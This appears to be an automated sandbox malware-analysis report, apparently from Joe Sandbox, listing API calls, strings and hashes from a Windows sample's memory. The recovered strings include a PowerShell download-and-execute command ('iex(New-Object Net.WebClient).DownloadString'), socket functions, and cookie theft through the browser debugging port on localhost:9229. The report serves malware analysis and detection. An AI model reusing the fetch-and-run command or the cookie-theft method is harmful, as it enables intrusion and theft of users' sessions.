                            • lstrcpy.KERNEL32(00000000,?), ref: 0044AE3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044AE49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AE6F
                            • lstrlen.KERNEL32(00000000), ref: 0044AE85
                            • lstrcpy.KERNEL32(00000000,00FFF340), ref: 0044AEB8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID: f
                            • API String ID: 2762123234-1993550816
                            • Opcode ID: ace5988b18f2359da1d5fd3abd9619f7875c16ac44f70f9e0893feca8069fc18
                            • Instruction ID: 32017969dc491086e90b56b69906e7659bba699ce5f231ecccbec686a76707d1
                            • Opcode Fuzzy Hash: ace5988b18f2359da1d5fd3abd9619f7875c16ac44f70f9e0893feca8069fc18
                            • Instruction Fuzzy Hash: D1B1C270A506169BDB21EF74CD48BAFB3BAAF04304F14142AF81197260DBB8DD10CBA9
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,004472A4), ref: 004547E6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 004547FC
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0045480D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0045481E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 0045482F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00454840
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 00454851
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 00454862
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00454873
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00454884
                            • GetProcAddress.KERNEL32(00000000,send), ref: 00454895
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: 7d1127dd25ecd3878dee5a619fedd609dd0941988d9b5bc05cf3fc177e58b443
                            • Instruction ID: d34ef339fc5bb1dc1607d3be7d8af35ac6bc554dac571dc4f7813a252ca14b7f
                            • Opcode Fuzzy Hash: 7d1127dd25ecd3878dee5a619fedd609dd0941988d9b5bc05cf3fc177e58b443
                            • Instruction Fuzzy Hash: 3C11E871D96720AF87209FB4AC0DB963ABEBB0B7097142A1BF851D3160EAF94410DB65
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044BE53
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044BE86
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0044BE91
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044BEB1
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0044BEBD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BEE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044BEEB
                            • lstrlen.KERNEL32(')"), ref: 0044BEF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BF13
                            • lstrcat.KERNEL32(00000000,')"), ref: 0044BF1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BF46
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0044BF66
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044BF88
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0044BF94
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BFBA
                            • ShellExecuteEx.SHELL32(?), ref: 0044C00C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: 8690ebc8ed28473a27b8c27a8be1ea68a08c1714467e7930253edf84982aedd3
                            • Instruction ID: 9ab8ae3350f736d33c8b69c322a217a4f9731ad0db3fb7d013cf56f3de71e5ab
                            • Opcode Fuzzy Hash: 8690ebc8ed28473a27b8c27a8be1ea68a08c1714467e7930253edf84982aedd3
                            • Instruction Fuzzy Hash: 8961B171A103059BDB21AFB5CD896AFBBA9EF48304F14242BF905D3251DBB8C9058B99
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0045184F
                            • lstrlen.KERNEL32(00FE6D00), ref: 00451860
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451887
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451892
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004518C1
                            • lstrlen.KERNEL32(00464FA0), ref: 004518D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004518F4
                            • lstrcat.KERNEL32(00000000,00464FA0), ref: 00451900
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0045192F
                            • lstrlen.KERNEL32(00FE6D20), ref: 00451945
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0045196C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451977
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004519A6
                            • lstrlen.KERNEL32(00464FA0), ref: 004519B8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004519D9
                            • lstrcat.KERNEL32(00000000,00464FA0), ref: 004519E5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451A14
                            • lstrlen.KERNEL32(00FE6D30), ref: 00451A2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451A51
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451A5C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451A8B
                            • lstrlen.KERNEL32(00FE6D50), ref: 00451AA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451AC8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451AD3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451B02
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: 51d4103dba7f40e263072de8ef199cd5d5d23c29758d5c1e1f41b3446fdd96d1
                            • Instruction ID: 69006cd8c4dbe9a46ee860105a4d1956d288bb269bd7d2b49bfac6a8e50c96be
                            • Opcode Fuzzy Hash: 51d4103dba7f40e263072de8ef199cd5d5d23c29758d5c1e1f41b3446fdd96d1
                            • Instruction Fuzzy Hash: 5F912FB16017029BDB21AFB5DD88B17B7EDAF04345F14642AEC86C3262DBB8DC45CB64
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444793
                            • LocalAlloc.KERNEL32(00000040,?), ref: 004447C5
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00444812
                            • lstrlen.KERNEL32(00464B60), ref: 0044481D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044483A
                            • lstrcat.KERNEL32(00000000,00464B60), ref: 00444846
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044486B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444898
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004448A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004448CA
                            • StrStrA.SHLWAPI(?,00000000), ref: 004448DC
                            • lstrlen.KERNEL32(?), ref: 004448F0
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00444931
                            • lstrcpy.KERNEL32(00000000,?), ref: 004449B8
                            • lstrcpy.KERNEL32(00000000,?), ref: 004449E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444A0A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444A30
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444A5D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: 27af6d05f36eb49785d153f355483e8de7dd027eb47d723cec85c8ec668e30c7
                            • Instruction ID: cc783268617a99aae7fafaf0e35273e2b572864aea91a614f5df3ef20933fdc6
                            • Opcode Fuzzy Hash: 27af6d05f36eb49785d153f355483e8de7dd027eb47d723cec85c8ec668e30c7
                            • Instruction Fuzzy Hash: 24B1C271A103069BEB21FF75D985A9F77B9AF88304F04502AFC46A7311DB78EC018B98
                            APIs
                              • Part of subcall function 004390C0: InternetOpenA.WININET(0045CFEC,00000001,00000000,00000000,00000000), ref: 004390DF
                              • Part of subcall function 004390C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004390FC
                              • Part of subcall function 004390C0: InternetCloseHandle.WININET(00000000), ref: 00439109
                            • strlen.MSVCRT ref: 004392E1
                            • strlen.MSVCRT ref: 004392FA
                              • Part of subcall function 00438980: std::_Xinvalid_argument.LIBCPMT ref: 00438996
                            • strlen.MSVCRT ref: 00439399
                            • strlen.MSVCRT ref: 004393E6
                            • lstrcat.KERNEL32(?,cookies), ref: 00439547
                            • lstrcat.KERNEL32(?,00461794), ref: 00439559
                            • lstrcat.KERNEL32(?,?), ref: 0043956A
                            • lstrcat.KERNEL32(?,00464B98), ref: 0043957C
                            • lstrcat.KERNEL32(?,?), ref: 0043958D
                            • lstrcat.KERNEL32(?,.txt), ref: 0043959F
                            • lstrlen.KERNEL32(?), ref: 004395B6
                            • lstrlen.KERNEL32(?), ref: 004395DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00439614
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: e4e5c513bfa644d40950597544d9db6c3ff2db99ee1b61a24c92cbc96b63f7dc
                            • Instruction ID: 844465d1d329cbabdc2f397ad3aaee4baaec72de462af9c95c4ded4d956053f1
                            • Opcode Fuzzy Hash: e4e5c513bfa644d40950597544d9db6c3ff2db99ee1b61a24c92cbc96b63f7dc
                            • Instruction Fuzzy Hash: 20E14B71E00218EFDF10EFA8D981ADEBBB5BF48304F1054AAE509A7241DB789E45CF95
                            APIs
                            • memset.MSVCRT ref: 0044D9A1
                            • memset.MSVCRT ref: 0044D9B3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044D9DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044DA0E
                            • lstrcat.KERNEL32(?,00000000), ref: 0044DA1C
                            • lstrcat.KERNEL32(?,00FFF2E0), ref: 0044DA36
                            • lstrcat.KERNEL32(?,?), ref: 0044DA4A
                            • lstrcat.KERNEL32(?,00FFDE70), ref: 0044DA5E
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044DA8E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0044DA95
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044DAFE
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: 4ff6637dbd91d5f2fc7d36614ea7a705db944b521a84cd1d715582c33e838d54
                            • Instruction ID: 133ff74a1c25b3dd11ce50746ee86de2c66a982c080ea60f50b6a37701929d5b
                            • Opcode Fuzzy Hash: 4ff6637dbd91d5f2fc7d36614ea7a705db944b521a84cd1d715582c33e838d54
                            • Instruction Fuzzy Hash: 46B1BFB1E00259AFDF10EFB4DC849EE77B9EF48304F14556AE906E3250DA789E44CBA4
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043B330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043B3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B3D9
                            • lstrlen.KERNEL32(00464C50), ref: 0043B450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B474
                            • lstrcat.KERNEL32(00000000,00464C50), ref: 0043B480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B4A9
                            • lstrlen.KERNEL32(00000000), ref: 0043B52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043B55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B587
                            • lstrlen.KERNEL32(00464AD4), ref: 0043B5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B622
                            • lstrcat.KERNEL32(00000000,00464AD4), ref: 0043B62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B65E
                            • lstrlen.KERNEL32(?), ref: 0043B767
                            • lstrlen.KERNEL32(?), ref: 0043B776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043B79E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 4651a1d7e68314b18f5efed99c99bc0416a125ad50b3d2b36f21bea2634ec05a
                            • Instruction ID: 77f1e236e75c2b93d8e531d81bcd1b7829816563264200b2a7ad5c8baa431fbb
                            • Opcode Fuzzy Hash: 4651a1d7e68314b18f5efed99c99bc0416a125ad50b3d2b36f21bea2634ec05a
                            • Instruction Fuzzy Hash: AA026170A01201CFCB25DF65C949B6AB7B5EF48308F19A06EE9059B362D779DC42CBD8
                            APIs
                              • Part of subcall function 004571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004571FE
                            • RegOpenKeyExA.ADVAPI32(?,00FF8A30,00000000,00020019,?), ref: 004537BD
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004537F7
                            • wsprintfA.USER32 ref: 00453822
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00453840
                            • RegCloseKey.ADVAPI32(?), ref: 0045384E
                            • RegCloseKey.ADVAPI32(?), ref: 00453858
                            • RegQueryValueExA.ADVAPI32(?,00FFF760,00000000,000F003F,?,?), ref: 004538A1
                            • lstrlen.KERNEL32(?), ref: 004538B6
                            • RegQueryValueExA.ADVAPI32(?,00FFF7C0,00000000,000F003F,?,00000400), ref: 00453927
                            • RegCloseKey.ADVAPI32(?), ref: 00453972
                            • RegCloseKey.ADVAPI32(?), ref: 00453989
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: 6a8cd8aaf8c3e25a233807b92497ae08a7e935d293b6c1ebd963171fa4df174d
                            • Instruction ID: fe769da1081a1e346a135e8c42e365c4ff0f6d35f2583c1e6c9ff788c34c551c
                            • Opcode Fuzzy Hash: 6a8cd8aaf8c3e25a233807b92497ae08a7e935d293b6c1ebd963171fa4df174d
                            • Instruction Fuzzy Hash: 0D91D0B29002089FCB10DFA4DD809EEB7B9FB48315F14856EF909A7212D775AE05CFA4
                            APIs
                            • InternetOpenA.WININET(0045CFEC,00000001,00000000,00000000,00000000), ref: 004390DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004390FC
                            • InternetCloseHandle.WININET(00000000), ref: 00439109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 00439166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00439197
                            • InternetCloseHandle.WININET(00000000), ref: 004391A2
                            • InternetCloseHandle.WININET(00000000), ref: 004391A9
                            • strlen.MSVCRT ref: 004391BA
                            • strlen.MSVCRT ref: 004391ED
                            • strlen.MSVCRT ref: 0043922E
                            • strlen.MSVCRT ref: 0043924C
                              • Part of subcall function 00438980: std::_Xinvalid_argument.LIBCPMT ref: 00438996
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: b9a596dc7de2315be2b34e0a38d4c05a059d1953fdb1373035af5a4480a5ff09
                            • Instruction ID: a67604871ded2a8d7aff25d3b083eb055a375f11c8a922bf5303e783722daa26
                            • Opcode Fuzzy Hash: b9a596dc7de2315be2b34e0a38d4c05a059d1953fdb1373035af5a4480a5ff09
                            • Instruction Fuzzy Hash: A151E671600305ABEB10DFA8DC45BDEF7BADB88715F14056AF904E3280DBF8EA448769
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004516A1
                            • lstrcpy.KERNEL32(00000000,00FEA788), ref: 004516CC
                            • lstrlen.KERNEL32(?), ref: 004516D9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004516F6
                            • lstrcat.KERNEL32(00000000,?), ref: 00451704
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0045172A
                            • lstrlen.KERNEL32(00FFEBF8), ref: 0045173F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00451762
                            • lstrcat.KERNEL32(00000000,00FFEBF8), ref: 0045176A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451792
                            • ShellExecuteEx.SHELL32(?), ref: 004517CD
                            • ExitProcess.KERNEL32 ref: 00451803
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: 527ab3c0cf6539435440647e7c18eaa8e987ed53de8605ed089d586a30397727
                            • Instruction ID: 73aee0027fb41b861800cd232a8da2f768f18ee1d0c1e219787420f3f4bb1b7b
                            • Opcode Fuzzy Hash: 527ab3c0cf6539435440647e7c18eaa8e987ed53de8605ed089d586a30397727
                            • Instruction Fuzzy Hash: 2E516070A01219ABDB11DFB5CD84B9FB7FEAF48301F14512AE905E3361DBB4AE058B94
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044EFE4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044F012
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0044F026
                            • lstrlen.KERNEL32(00000000), ref: 0044F035
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 0044F053
                            • StrStrA.SHLWAPI(00000000,?), ref: 0044F081
                            • lstrlen.KERNEL32(?), ref: 0044F094
                            • lstrlen.KERNEL32(00000000), ref: 0044F0B2
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0044F0FF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0044F13F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
